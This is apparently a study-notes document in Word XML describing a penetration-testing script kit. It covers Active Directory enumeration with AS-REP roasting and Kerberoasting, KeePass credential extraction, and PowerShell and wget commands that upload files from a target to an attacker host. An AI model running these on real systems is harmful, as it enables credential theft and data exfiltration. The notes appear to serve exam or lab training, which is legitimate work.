    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002BC">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>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F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jypauk9xvt29" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX-Scripts</w:t>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t xml:space="preserve">A tool from Github with scripts that are made for XXXXXXXXX: </w:t>
      </w:r>
      <w:hyperlink r:id="rId17">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/yaldobaoth/XXXXXXXXX-Scripts#</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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t xml:space="preserve">But, they are incredibly useful and can definitely be used for beyond XXXXXXXXX</w:t>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The scripts are located in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /opt/XXXXXXXXX-scripts </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The github clone is in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~/Downloads/XXXXXXXXX-Scripts</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highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">All scripts are added to PATH so you can run them from anywhere</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">My favorites include:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">enum-AD:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which gives a list of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">domain users</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, does bloodhound ingest (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I disabled this</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), does </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AS-REP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kerberoast</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and checks </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Password Policy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">saves list of domain users to a file called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Puts the rest into terminal as output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After inspecting the enum-AD script, it seems like it doesn't work when the password includes a space, so keep that in mind!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">enum-AD -i &lt;DC-IP&gt; -u &lt;domain user&gt; -p|-H &lt;password|hash&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D2">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D3">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kdbx-crawl:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parses through kdbx files and gives creds in nice format</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Usage: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kdbx-crawl -f &lt;kdbx file&gt; -p|-H &lt;password|hash&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D6">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D7">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">upload-server:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> It's like python hosting server </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BUT IT WORKS BOTH WAYS, meaning we can download from Kali, or upload files to Kali</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, meaning we don't need to set up </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-smbserver</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SCP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="891"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the output (after running the command), they teach you how to upload (use PUT instead of POST)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="891"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you see errors after running the command in powershell, ignore that and check your Kali to see if the upload to Kali worked, since it probably did</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="891"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Usage:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> upload-server &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="891"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows PS:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="891"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Invoke-WebRequest -Uri http://192.168.45.232:80/&lt;outfile&gt; -Method </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PUT </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-InFile &lt;file_path&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="891"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Invoke-WebRequest -Uri http://192.168.45.232:80/&lt;outfile&gt; -Method POST -InFile &lt;file_path&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="891"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux wget:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="891"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget --method=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PUT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --body-file=&lt;file_path&gt; http://192.168.45.232:80/&lt;outfile&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="891"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wget --method=POST --body-file=&lt;file_path&gt; http://192.168.45.232:80/&lt;outfile&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E2">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reboot.c:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> a tool that supposedly helps reboot machine if it doesn't work with the shutdown command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I saved the precompiled .exe in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~/Downloads/XXXXXXXXX-Scripts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For 64-bit: use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reboot.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For 32-bit: use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reboot32.exe</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numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.\reboot.exe</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">clock-sync</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is for the Kerberos time skew problem. You can alternatively use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ntpdate [insert domain name here]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sync time with Domain</w:t>
      </w:r>
    </w:p>
